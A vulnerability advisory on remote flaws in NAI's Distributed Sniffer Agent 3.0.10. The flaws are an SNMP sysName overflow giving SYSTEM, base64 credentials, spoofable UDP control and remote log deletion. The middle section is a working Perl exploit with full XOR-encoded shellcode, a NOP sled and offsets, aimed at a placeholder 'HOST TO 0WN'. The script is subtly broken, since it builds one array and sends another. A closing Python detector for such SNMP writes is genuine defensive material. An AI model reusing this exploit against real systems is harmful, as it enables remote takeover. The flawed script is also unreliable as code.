Vulnerability: Distributed Sniffer Agent

Affected: NAI's Distributed Sniffer Agent

Description:

Kevin Start found the following. This 'advisory' details a number of problems with NAI's sniffer product. They have fixed the problems in current versions on the sly, so we have foregone notifying the vendor. They saw fit to post an advisory on Microsoft's Netmon today, so 'all is fair in love and war'; at least MS had the dignity to announce their fixes.

NAI's Distributed Sniffer Agent can be overflowed remotely to gain SYSTEM privilege. Additional vulnerabilities exist in the management protocol that allow an attacker to recover logins and passwords, take control of the agent, and delete logs. This was tested with Agent version 3.0.10 on Windows NT Workstation 4.0 SP6.

1. The most severe problem is an overflow during SNMP writes. NAI elected to use a single community string for both public and private access, which simplifies brute-forcing it. Once the string has been guessed, shellcode can be written into any accessible object (sysName, for example). The buffer is 256 bytes long with no character restrictions, since nulls are allowed when hex mode is used as the SNMP encoding. The attack can be launched completely blind with one spoofed UDP packet. SYSTEM privilege can be gained using this method.

2. Authentication is handled using base64-encoded logins and passwords. Dsniff by Dugsong already includes a module for capturing logins and passwords from the agent. Base64 encoding is also used to obfuscate changes to the agent's user database.

3. All remote access to the agent is handled over UDP. Once a user has authenticated to the agent, an attacker can inject his own spoofed commands, and full control of the agent can be gained in this manner. If the packet generation facility is enabled, a packet flood could be initiated.

4. All data transferred from the agent is in cleartext, allowing an attacker to recover data being sniffed on a remote network segment.

5. Flooding the agent with false login requests can cause system instability. A kernel fault was caused during testing.

6. Logs can be deleted remotely, allowing an attacker to delete his own brute-forcing attempts once he is successful.

Exploit:

#!/usr/bin/perl
# exploit for NAI Sniffer Agent 3.0.10
# Silently patched in later versions, although customers
# were not notified. No workaround was ever released.

$xoredport="88 88 "; # (4369) port XORed with 0x99

$egg =" eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2 af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61 90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56 ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0 ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1 06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53 ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab 58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50 57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57 c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47 38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50 50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76 f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57 f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff 57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77 a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff 57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56 53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8 6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7 dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99 de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99 da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7 f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8 f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1 f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0 ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd 99 eb fc fa ef 99 9b 99 $xoredport 99 99 99 99 99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99 ff ff ff ff ";

$offset = "00 c7 12 00 ";
$snmpset = "/usr/bin/snmpset";
$community = "public";
$objid = "system.sysName.0";
$offcount = 80;
$nopcount = 200;
@execstring = ("\" ", $offset x $offcount, "90 "x $nopcount, $egg," \"");
$host="HOST TO 0WN";
exec ("$snmpset $host $community $objid x @sploitstring");

Solution: Fixed in current versions.
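The SNMP write in item 1 has a recognisable shape on the wire: an SNMPv1 SetRequest, sent with a guessable community string, carrying an oversized, non-printable OCTET STRING into a scalar such as sysName. The following detector is an added example, not code from the advisory or from NAI; it contains a minimal BER/SNMPv1 encoder and decoder so that it runs offline on packets it constructs itself. The sample packets, the threshold of 64 bytes, and the community string "ops-rw-7f2" are all assumptions made for the example.

```python
"""Flag SNMPv1 SetRequests that match the write-to-sysName overflow pattern.

Added example: standard SNMPv1 BER framing (RFC 1157), no third-party modules.
"""

OID_SYSNAME = "1.3.6.1.2.1.1.5.0"                       # system.sysName.0
TAG_INT, TAG_OCTSTR, TAG_NULL, TAG_OID, TAG_SEQ = 0x02, 0x04, 0x05, 0x06, 0x30
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest",
             0xA2: "GetResponse", 0xA3: "SetRequest"}
DEFAULT_COMMUNITIES = {"public", "private"}            # guessable by design


# ---- tiny BER encoder (used only to build the constructed samples) ----
def ber_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def enc_int(v):                      # non-negative INTEGER, sign bit kept clear
    return tlv(TAG_INT, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big"))


def enc_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for a in arcs[2:]:               # base-128, high bit set on all but last byte
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))
    return tlv(TAG_OID, bytes(out))


def build_pdu(pdu_tag, community, oid, value_tlv, req_id=1):
    varbind = tlv(TAG_SEQ, enc_oid(oid) + value_tlv)
    pdu = tlv(pdu_tag, enc_int(req_id) + enc_int(0) + enc_int(0)
              + tlv(TAG_SEQ, varbind))
    return tlv(TAG_SEQ, enc_int(0) + tlv(TAG_OCTSTR, community.encode()) + pdu)


# ---- decoder: what a sensor would run over each UDP/161 payload ----
def read_tlv(buf, pos=0):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:                    # long-form length
        n = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + ln
    if end > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:end], end


def dec_oid(b):
    arcs, acc = [b[0] // 40, b[0] % 40], 0
    for byte in b[1:]:
        acc = (acc << 7) | (byte & 0x7F)
        if not byte & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def parse_snmp(pkt):
    tag, msg, _ = read_tlv(pkt)
    if tag != TAG_SEQ:
        raise ValueError("not an SNMP message")
    _, ver, p = read_tlv(msg)
    _, comm, p = read_tlv(msg, p)
    pdu_tag, pdu, _ = read_tlv(msg, p)
    _, _, q = read_tlv(pdu)          # request-id
    _, _, q = read_tlv(pdu, q)       # error-status
    _, _, q = read_tlv(pdu, q)       # error-index
    _, vbl, _ = read_tlv(pdu, q)     # SEQUENCE OF VarBind
    varbinds, r = [], 0
    while r < len(vbl):
        _, vb, r = read_tlv(vbl, r)
        _, oid, s = read_tlv(vb)
        vtag, val, _ = read_tlv(vb, s)
        varbinds.append((dec_oid(oid), vtag, val))
    return {"version": int.from_bytes(ver, "big"),
            "community": comm.decode("latin-1"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "varbinds": varbinds}


def inspect_set_request(pkt, max_value_len=64):
    """Return alert labels for one payload; an empty list means nothing to flag."""
    msg = parse_snmp(pkt)
    if msg["pdu"] != "SetRequest":
        return []
    alerts = []
    if msg["community"] in DEFAULT_COMMUNITIES:
        alerts.append("set-with-default-community")
    for oid, vtag, val in msg["varbinds"]:
        if vtag == TAG_OCTSTR and len(val) > max_value_len:
            alerts.append(f"oversized-value:{oid}:{len(val)}")
        if vtag == TAG_OCTSTR and any(b < 0x20 or b > 0x7E for b in val):
            alerts.append(f"binary-value:{oid}")
    return alerts


# Constructed samples, not captured traffic.
BENIGN_GET = build_pdu(0xA0, "public", OID_SYSNAME, tlv(TAG_NULL, b""))
BENIGN_SET = build_pdu(0xA3, "ops-rw-7f2", OID_SYSNAME, tlv(TAG_OCTSTR, b"core-sw1"))
HOSTILE_SET = build_pdu(0xA3, "public", OID_SYSNAME, tlv(TAG_OCTSTR, b"\x90" * 256))

if __name__ == "__main__":
    for name, pkt in (("get", BENIGN_GET), ("set", BENIGN_SET), ("hostile", HOSTILE_SET)):
        print(name, inspect_set_request(pkt))
```

The three checks map to the advisory's three conditions: a write attempted with a default community (the single-community design), a value longer than any legitimate hostname (the 256-byte buffer), and non-printable bytes in a string object (the hex-mode encoding that admits nulls). A real sensor would feed `inspect_set_request` each UDP payload destined to the agent's SNMP port; because the request is a single spoofed datagram, the source address in such an alert should not be trusted as the attacker's location.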